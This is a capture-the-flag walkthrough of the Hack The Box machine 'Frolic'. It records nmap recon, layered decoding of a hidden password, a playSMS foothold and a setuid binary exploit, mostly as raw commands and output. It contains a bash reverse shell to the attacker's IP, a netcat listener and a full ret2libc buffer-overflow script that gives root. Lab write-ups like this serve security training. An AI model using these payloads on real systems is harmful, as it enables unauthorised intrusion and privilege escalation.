frolic
Introduction:
Recon
1eneloop@kinetic:.../hackthebox/frolic/data$ sudo nmap -sS -sV -sC -T4 -O -oN nmap.frolic.htb 10.10.10.111
2[sudo] password for eneloop:
3Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-22 20:48 EST
4Nmap scan report for 10.10.10.111
5Host is up (0.015s latency).
6Not shown: 996 closed ports
7PORT STATE SERVICE VERSION
822/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
9| ssh-hostkey:
10| 2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA)
11| 256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA)
12|_ 256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519)
13139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
14445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
159999/tcp open http nginx 1.10.3 (Ubuntu)
16|_http-server-header: nginx/1.10.3 (Ubuntu)
17|_http-title: Welcome to nginx!
18No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
19TCP/IP fingerprint:
20OS:SCAN(V=7.91%E=4%D=2/22%OT=22%CT=1%CU=42387%PV=Y%DS=2%DC=I%G=Y%TM=60345EF
21OS:1%P=x86_64-pc-linux-gnu)SEQ(SP=FD%GCD=1%ISR=10E%TI=Z%CI=I%II=I%TS=8)OPS(
22OS:O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11
23OS:NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(
24OS:R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
25OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
26OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
27OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
28OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
29OS:S)
30
31Network Distance: 2 hops
32Service Info: Host: FROLIC; OS: Linux; CPE: cpe:/o:linux:linux_kernel
33
34Host script results:
35|_clock-skew: mean: -1h40m52s, deviation: 3h10m31s, median: 9m07s
36|_nbstat: NetBIOS name: FROLIC, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
37| smb-os-discovery:
38| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
39| Computer name: frolic
40| NetBIOS computer name: FROLIC\x00
41| Domain name: \x00
42| FQDN: frolic
43|_ System time: 2021-02-23T07:27:40+05:30
44| smb-security-mode:
45| account_used: guest
46| authentication_level: user
47| challenge_response: supported
48|_ message_signing: disabled (dangerous, but default)
49| smb2-security-mode:
50| 2.02:
51|_ Message signing enabled but not required
52| smb2-time:
53| date: 2021-02-23T01:57:40
54|_ start_date: N/A
55
56OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
57Nmap done: 1 IP address (1 host up) scanned in 26.33 seconds
58
Enumeration
(py3) eneloop@kinetic:…/zerotrust/content/lab$ smbmap -u guest -H 10.10.10.111
[+] Guest session IP: 10.10.10.111:445 Name: 10.10.10.111
Disk Permissions Comment
—- ———– ——-
print$ NO ACCESS Printer Drivers
IPC$ NO ACCESS IPC Service (frolic server (Samba, Ubuntu))
(py3) eneloop@kinetic:…/zerotrust/content/lab$
http://frolic.htb:9999/backup/password.txt password - imnothuman
http://frolic.htb:9999/backup/user.txt user - admin
Exploitation
(py3) eneloop@kinetic:…/hackthebox/frolic/data$ echo “asdiSIAJJ0QWE9JAS UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwAB BAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbs K1i6f+BQyOES4baHpOrQu+J4XxPATolb/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmve EMrX4+T7al+fi/kY6ZTAJ3h/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn/uoTj lurp78cmcTJviFfUnOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j/lsUsAAAAGkC AAAJABgAAAAAAAEAAACkgQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAAAAABAAAAABQSwUG AAAAAAEAAQBPAAAAAwEAAAAA==” | base64 -d j�bH� ‘D�@base64: invalid input (py3) eneloop@kinetic:…/hackthebox/frolic/data$ echo “asdiSIAJJ0QWE9JAS UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwAB BAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbs K1i6f+BQyOES4baHpOrQu+J4XxPATolb/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmve EMrX4+T7al+fi/kY6ZTAJ3h/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn/uoTj lurp78cmcTJviFfUnOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j/lsUsAAAAGkC AAAJABgAAAAAAAEAAACkgQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAA^CABAAAAABQSwUG AAAAAAEAAQBPAAAAAwEAAAAA==” | base64 -d (py3) eneloop@kinetic:…/hackthebox/frolic/data$ (py3) eneloop@kinetic:…/hackthebox/frolic/data$ (py3) eneloop@kinetic:…/hackthebox/frolic/data$ (py3) eneloop@kinetic:…/hackthebox/frolic/data$ (py3) eneloop@kinetic:…/hackthebox/frolic/data$ (py3) eneloop@kinetic:…/hackthebox/frolic/data$ vi asdiSIAJJ0QWE9JAS ^C (py3) eneloop@kinetic:…/hackthebox/frolic/data$ cp asdiSIAJJ0QWE9JAS asdiSIAJJ0QWE9JAS.clean (py3) eneloop@kinetic:…/hackthebox/frolic/data$ vi asdiSIAJJ0QWE9JAS (py3) eneloop@kinetic:…/hackthebox/frolic/data$ cat asdiSIAJJ0QWE9JAS.clean | base64 -d PK É7M#�[�i index.phpUT �|�[�|�[ux base64: invalid input (py3) eneloop@kinetic:…/hackthebox/frolic/data$ cat asdiSIAJJ0QWE9JAS.clean UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwAB BAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbs K1i6f+BQyOES4baHpOrQu+J4XxPATolb/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmve EMrX4+T7al+fi/kY6ZTAJ3h/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn/uoTj lurp78cmcTJviFfUnOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j/lsUsAAAAGkC AAAJABgAAAAAAAEAAACkgQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAAAAABAAAAABQSwUG AAAAAAEAAQBPAAAAAwEAAAAA (py3) eneloop@kinetic:…/hackthebox/frolic/data$ vi asdiSIAJJ0QWE9JAS.clean (py3) eneloop@kinetic:…/hackthebox/frolic/data$ cat asdiSIAJJ0QWE9JAS.clean | base64 -d PK É7M#�[�i index.phpUT �|�[�|�[ux ^D�J�s�h�)�P�n ��Ss�Jw��4��ُk�z��UȖ�+X��P��ᶇ��л�x_�N�[���S��8����J2S�*�DЍ}�8dTQk������j_�����'xc��ݏt��75Q� ���k,4��b)�4F�� ��������&q2o�WԜ�9P#�[�iPK É7M#�[�i ��index.phpUT�|�[ux PKO(py3) eneloop@kinetic:…/hackthebox/frolic/data$ cat asdiSIAJJ0QWE9JAS.clean | base64 -d > asdiSIAJJ0QWE9JAS.decoded (py3) eneloop@kinetic:…/hackthebox/frolic/data$ file asdiSIAJJ0QWE9JAS.decoded asdiSIAJJ0QWE9JAS.decoded: Zip archive data, at least v2.0 to extract (py3) eneloop@kinetic:…/hackthebox/frolic/data$
(py3) eneloop@kinetic:…/hackthebox/frolic/data$ mv asdiSIAJJ0QWE9JAS.decoded asdiSIAJJ0QWE9JAS.zip (py3) eneloop@kinetic:…/hackthebox/frolic/data$ zipinfo asdiSIAJJ0QWE9JAS.zip Archive: asdiSIAJJ0QWE9JAS.zip Zip file size: 360 bytes, number of entries: 1 -rw-r–r– 3.0 unx 617 TX defN 18-Sep-23 07:44 index.php 1 file, 617 bytes uncompressed, 164 bytes compressed: 73.4% (py3) eneloop@kinetic:…/hackthebox/frolic/data$ unzip asdiSIAJJ0QWE9JAS.zip Archive: asdiSIAJJ0QWE9JAS.zip [asdiSIAJJ0QWE9JAS.zip] index.php password:
(py3) eneloop@kinetic:…/hackthebox/frolic/data$ cat index.php 4b7973724b7973674b7973724b7973675779302b4b7973674b7973724b7973674b79737250463067506973724b7973674b7934744c5330674c5330754b7973674b7973724b7973674c6a77720d0a4b7973675779302b4b7973674b7a78645069734b4b797375504373674b7974624c5434674c53307450463067506930744c5330674c5330754c5330674c5330744c5330674c6a77724b7973670d0a4b317374506973674b79737250463067506973724b793467504373724b3173674c5434744c53304b5046302b4c5330674c6a77724b7973675779302b4b7973674b7a7864506973674c6930740d0a4c533467504373724b3173674c5434744c5330675046302b4c5330674c5330744c533467504373724b7973675779302b4b7973674b7973385854344b4b7973754c6a776743673d3d0d0a (py3) eneloop@kinetic:…/hackthebox/frolic/data$ cat index.php | xxd -r -p KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKy4tLS0gLS0uKysgKysrKysgLjwr KysgWy0+KysgKzxdPisKKysuPCsgKytbLT4gLS0tPF0gPi0tLS0gLS0uLS0gLS0tLS0gLjwrKysg K1stPisgKysrPF0gPisrKy4gPCsrK1sgLT4tLS0KPF0+LS0gLjwrKysgWy0+KysgKzxdPisgLi0t LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS0tLS4gPCsrKysgWy0+KysgKys8XT4KKysuLjwgCg==
(py3) eneloop@kinetic:…/hackthebox/frolic/data$ echo “KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKy4tLS0gLS0uKysgKysrKysgLjwrKysgWy0+KysgKzxdPisKKysuPCsgKytbLT4gLS0tPF0gPi0tLS0gLS0uLS0gLS0tLS0gLjwrKysgK1stPisgKysrPF0gPisrKy4gPCsrK1sgLT4tLS0KPF0+LS0gLjwrKysgWy0+KysgKzxdPisgLi0tLS4gPCsrK1sgLT4tLS0gPF0+LS0gLS0tLS4gPCsrKysgWy0+KysgKys8XT4KKysuLjwgCg==” | base64 -d +++++ +++++ [->++ +++++ +++<] >++++ +.— –.++ +++++ .<+++ [->++ +<]>+ ++.<+ ++[-> —<] >—- –.– —– .<+++ +[->+ +++<] >+++. <+++[ ->— <]>– .<+++ [->++ +<]>+ .—. <+++[ ->— <]>– —-. <++++ [->++ ++<]> ++..< (py3) eneloop@kinetic:…/hackthebox/frolic/data$
https://www.dcode.fr/brainfuck-language
idkwhatispass
(py3) eneloop@kinetic:…/hackthebox/frolic/data$ cat payload.csv “”,“test message”,admin (py3) eneloop@kinetic:…/hackthebox/frolic/data$
(py3) eneloop@kinetic:…/hackthebox/frolic/data$ python -m http.server Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) … 10.10.10.111 - - [27/Feb/2021 09:53:29] “GET /shell.sh HTTP/1.1” 200 -
(py3) eneloop@kinetic:…/hackthebox/frolic/data$ cat payload cat: payload: Is a directory (py3) eneloop@kinetic:…/hackthebox/frolic/data$ cat payload.csv “”,“test message”,admin (py3) eneloop@kinetic:…/hackthebox/frolic/data$ cat shell.sh #! /bin/bash
bash -i >& /dev/tcp/10.10.14.38/4455 0>&1 (py3) eneloop@kinetic:…/hackthebox/frolic/data$ nc -lvnp 4455 listening on [any] 4455 … connect to [10.10.14.38] from (UNKNOWN) [10.10.10.111] 34924 bash: cannot set terminal process group (1217): Inappropriate ioctl for device bash: no job control in this shell www-data@frolic:~/html/playsms$
Post-exploit/PrivEsc
www-data@frolic:/home/ayush$ ls ls user.txt www-data@frolic:/home/ayush$ ls -all ls -all total 36 drwxr-xr-x 3 ayush ayush 4096 Sep 25 2018 . drwxr-xr-x 4 root root 4096 Sep 23 2018 .. -rw——- 1 ayush ayush 2781 Sep 25 2018 .bash_history -rw-r–r– 1 ayush ayush 220 Sep 23 2018 .bash_logout -rw-r–r– 1 ayush ayush 3771 Sep 23 2018 .bashrc drwxrwxr-x 2 ayush ayush 4096 Sep 25 2018 .binary -rw-r–r– 1 ayush ayush 655 Sep 23 2018 .profile -rw——- 1 ayush ayush 965 Sep 25 2018 .viminfo -rwxr-xr-x 1 ayush ayush 33 Sep 25 2018 user.txt www-data@frolic:/home/ayush$ cd
www-data@frolic:/home/ayush/.binary$ ls -l ls -l total 8 -rwsr-xr-x 1 root root 7480 Sep 25 2018 rop www-data@frolic:/home/ayush/.binary$
Download the file :
www-data@frolic:/home/ayush/.binary$ python -m SimpleHTTPServer python -m SimpleHTTPServer Serving HTTP on 0.0.0.0 port 8000 … 10.10.14.38 - - [28/Feb/2021 01:10:55] “GET /rop HTTP/1.1” 200 - ^C
(py3) eneloop@kinetic:…/hackthebox/frolic/data$ wget http://frolic.htb:8000/rop –2021-02-27 14:31:41– http://frolic.htb:8000/rop Resolving frolic.htb (frolic.htb)… 10.10.10.111 Connecting to frolic.htb (frolic.htb)|10.10.10.111|:8000… connected. HTTP request sent, awaiting response… 200 OK Length: 7480 (7.3K) [application/octet-stream] Saving to: ‘rop’
rop 100%[===============================================>] 7.30K –.-KB/s in 0s
2021-02-27 14:31:41 (222 MB/s) - ‘rop’ saved [7480/7480]
(py3) eneloop@kinetic:…/hackthebox/frolic/data$
(py3) eneloop@kinetic:…/hackthebox/frolic/data$ python -c ‘print(“A”*100)’
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
(py3) eneloop@kinetic:…/hackthebox/frolic/data$ ./rop python -c ‘print(“A”*100)’
[+] Message sent: python(py3) eneloop@kinetic:…/hackthebox/frolic/data$
(py3) eneloop@kinetic:…/hackthebox/frolic/data$ ./rop python -c 'print("A"*100)'
Segmentation fault
(py3) eneloop@kinetic:…/hackthebox/frolic/data$
(py3) eneloop@kinetic:…/hackthebox/frolic/data$ gdb rop GNU gdb (Debian 10.1-1.5) 10.1 Copyright (C) 2020 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later http://gnu.org/licenses/gpl.html This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type “show copying” and “show warranty” for details. This GDB was configured as “x86_64-linux-gnu”. Type “show configuration” for configuration details. For bug reporting instructions, please see: https://www.gnu.org/software/gdb/bugs/. Find the GDB manual and other documentation resources online at: http://www.gnu.org/software/gdb/documentation/.
For help, type “help”. Type “apropos word” to search for commands related to “word”… Reading symbols from rop… (No debugging symbols found in rop) gdb-peda$ r Hello World Starting program: /oscp/LABs/zerotrust/content/lab/hackthebox/frolic/data/rop Hello World [+] Message sent: Hello[Inferior 1 (process 2850) exited normally] Warning: not running gdb-peda$ pattern_create 100 ‘AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL’ gdb-peda$ r ‘AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL’ Starting program: /oscp/LABs/zerotrust/content/lab/hackthebox/frolic/data/rop ‘AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL’
Program received signal SIGSEGV, Segmentation fault. [———————————-registers———————————–] EAX: 0x79 (‘y’) EBX: 0xffffcf80 –> 0x2 ECX: 0x0 EDX: 0x5f ('_') ESI: 0xf7faf000 –> 0x1e4d6c EDI: 0xf7faf000 –> 0x1e4d6c EBP: 0x31414162 (‘bAA1’) ESP: 0xffffcf50 (“AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL”) EIP: 0x41474141 (‘AAGA’) EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow) [————————————-code————————————-] Invalid $PC address: 0x41474141 [————————————stack————————————-] 0000| 0xffffcf50 (“AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL”) 0004| 0xffffcf54 (“2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL”) 0008| 0xffffcf58 (“AAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL”) 0012| 0xffffcf5c (“A3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL”) 0016| 0xffffcf60 (“IAAeAA4AAJAAfAA5AAKAAgAA6AAL”) 0020| 0xffffcf64 (“AA4AAJAAfAA5AAKAAgAA6AAL”) 0024| 0xffffcf68 (“AJAAfAA5AAKAAgAA6AAL”) 0028| 0xffffcf6c (“fAA5AAKAAgAA6AAL”) [——————————————————————————] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x41474141 in ?? () gdb-peda$
gdb-peda$ pattern_offset 0x41474141 1095188801 found at offset: 52 gdb-peda$ r ‘AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAd3adc0d3’ Starting program: /oscp/LABs/zerotrust/content/lab/hackthebox/frolic/data/rop ‘AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAd3adc0d3’
Program received signal SIGSEGV, Segmentation fault. [———————————-registers———————————–] EAX: 0x3c ('<') EBX: 0xffffcfb0 –> 0x2 ECX: 0x0 EDX: 0x0 ESI: 0xf7faf000 –> 0x1e4d6c EDI: 0xf7faf000 –> 0x1e4d6c EBP: 0x41414141 (‘AAAA’) ESP: 0xffffcf80 (“c0d3”) EIP: 0x64613364 (‘d3ad’) EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow) [————————————-code————————————-] Invalid $PC address: 0x64613364 [————————————stack————————————-] 0000| 0xffffcf80 (“c0d3”) 0004| 0xffffcf84 –> 0xffffd000 –> 0x0 0008| 0xffffcf88 –> 0xffffd060 –> 0xffffd27b (“SHELL=/bin/bash”) 0012| 0xffffcf8c –> 0x8048561 (<__libc_csu_init+33>: lea eax,[ebx-0xf8]) 0016| 0xffffcf90 –> 0xffffcfb0 –> 0x2 0020| 0xffffcf94 –> 0x0 0024| 0xffffcf98 –> 0x0 0028| 0xffffcf9c –> 0xf7de8e46 (<__libc_start_main+262>: add esp,0x10) [——————————————————————————] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x64613364 in ?? () gdb-peda$ gdb-peda$
gdb-peda$ checksec CANARY : disabled FORTIFY : disabled NX : ENABLED PIE : disabled RELRO : Partial gdb-peda$
Check if ASLR is enabled on target machine:
cat /proc/sys/kernel/randomize_va_space 0 0 Means disabled. 1 means enabled.
www-data@frolic:/home/ayush/.binary$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep -i system
</.binary$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep -i system
245: 00112f20 68 FUNC GLOBAL DEFAULT 13 svcerr_systemerr@@GLIBC_2.0
627: 0003ada0 55 FUNC GLOBAL DEFAULT 13 __libc_system@@GLIBC_PRIVATE
1457: 0003ada0 55 FUNC WEAK DEFAULT 13 system@@GLIBC_2.0
www-data@frolic:/home/ayush/.binary$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep -i exit
</.binary$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep -i exit
112: 0002edc0 39 FUNC GLOBAL DEFAULT 13 __cxa_at_quick_exit@@GLIBC_2.10
141: 0002e9d0 31 FUNC GLOBAL DEFAULT 13 exit@@GLIBC_2.0
450: 0002edf0 197 FUNC GLOBAL DEFAULT 13 __cxa_thread_atexit_impl@@GLIBC_2.18
558: 000b07c8 24 FUNC GLOBAL DEFAULT 13 _exit@@GLIBC_2.0
616: 00115fa0 56 FUNC GLOBAL DEFAULT 13 svc_exit@@GLIBC_2.0
652: 0002eda0 31 FUNC GLOBAL DEFAULT 13 quick_exit@@GLIBC_2.10
876: 0002ebf0 85 FUNC GLOBAL DEFAULT 13 __cxa_atexit@@GLIBC_2.1.3
1046: 0011fb80 52 FUNC GLOBAL DEFAULT 13 atexit@GLIBC_2.0
1394: 001b2204 4 OBJECT GLOBAL DEFAULT 33 argp_err_exit_status@@GLIBC_2.1
1506: 000f3870 58 FUNC GLOBAL DEFAULT 13 pthread_exit@@GLIBC_2.0
1849: 000b07c8 24 FUNC WEAK DEFAULT 13 _Exit@@GLIBC_2.1.1
2108: 001b2154 4 OBJECT GLOBAL DEFAULT 33 obstack_exit_failure@@GLIBC_2.0
2263: 0002e9f0 78 FUNC WEAK DEFAULT 13 on_exit@@GLIBC_2.0
2406: 000f4c80 2 FUNC GLOBAL DEFAULT 13 __cyg_profile_func_exit@@GLIBC_2.2
Prepare the exploit:
www-data@frolic:/home/ayush/.binary$ strings -atx /lib/i386-linux-gnu/libc.so.6| grep /bin/sh
</.binary$ strings -atx /lib/i386-linux-gnu/libc.so.6| grep /bin/sh
15ba0b /bin/sh
www-data@frolic:/home/ayush/.binary$
(py2) eneloop@kinetic:…/hackthebox/frolic/data$ cat exploit.py import struct buff= “A” *52 libc = 0xb7e19000 system = struct.pack('<I’,libc + 0x0003ada0) exit = struct.pack('<I',libc + 0x0002e9d0) binsh = struct.pack('<I',libc + 0x15ba0b)
payload= buff + system + exit + binsh print payload (py2) eneloop@kinetic:…/hackthebox/frolic/data$
Test and Transfer the exploit
(py2) eneloop@kinetic:…/hackthebox/frolic/data$ python ./exploit.py AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�=��y� J�� (py2) eneloop@kinetic:…/hackthebox/frolic/data$ cat exploit.py base64 -w 0 cat: invalid option – ‘w’ Try ‘cat –help’ for more information. (py2) eneloop@kinetic:…/hackthebox/frolic/data$ cat exploit.py |base64 -w 0 aW1wb3J0IHN0cnVjdApidWZmPSAiQSIgKjUyCmxpYmMgPSAweGI3ZTE5MDAwCnN5c3RlbSA9IHN0cnVjdC5wYWNrKCc8SScsbGliYyArIDB4MDAwM2FkYTApCmV4aXQgPSBzdHJ1Y3QucGFjaygnPEknLGxpYmMgKyAweDAwMDJlOWQwKQpiaW5zaCA9IHN0cnVjdC5wYWNrKCc8SScsbGliYyArIDB4MTViYTBiKQoKcGF5bG9hZD0gYnVmZiArIHN5c3RlbSArIGV4aXQgKyBiaW5zaApwcmludCBwYXlsb2FkCg==
www-data@frolic:/home/ayush/.binary$ echo -n aW1wb3J0IHN0cnVjdApidWZmPSAiQSIgKjUyCmxpYmMgPSAweGI3ZTE5MDAwCnN5c3RlbSA9IHN0cnVjdC5wYWNrKCc8SScsbGliYyArIDB4MDAwM2FkYTApCmV4aXQgPSBzdHJ1Y3QucGFjaygnPEknLGxpYmMgKyAweDAwMDJlOWQwKQpiaW5zaCA9IHN0cnVjdC5wYWNrKCc8SScsbGliYyArIDB4MTViYTBiKQoKcGF5bG9hZD0gYnVmZiArIHN5c3RlbSArIGV4aXQgKyBiaW5zaApwcmludCBwYXlsb2FkCg==| base64 -d > /dev/shm/exploit.py
<IGV4aXQgKyBiaW5zaApwcmludCBwYXlsb2FkCg==| base64 -d > /dev/shm/exploit.py
www-data@frolic:/home/ayush/.binary$ cat /dev/shm/exploit.py
cat /dev/shm/exploit.py
import struct
buff= “A” *52
libc = 0xb7e19000
system = struct.pack('<I',libc + 0x0003ada0)
exit = struct.pack('<I',libc + 0x0002e9d0)
binsh = struct.pack('<I',libc + 0x15ba0b)
payload= buff + system + exit + binsh print payload www-data@frolic:/home/ayush/.binary$ ./rop $(python /dev/shm/exploit.py) ./rop $(python /dev/shm/exploit.py)
cd /root
cd /root
ls
ls root.txt
cat root.txt
cat root.txt 85XXXXXXXXXXXXXXXX22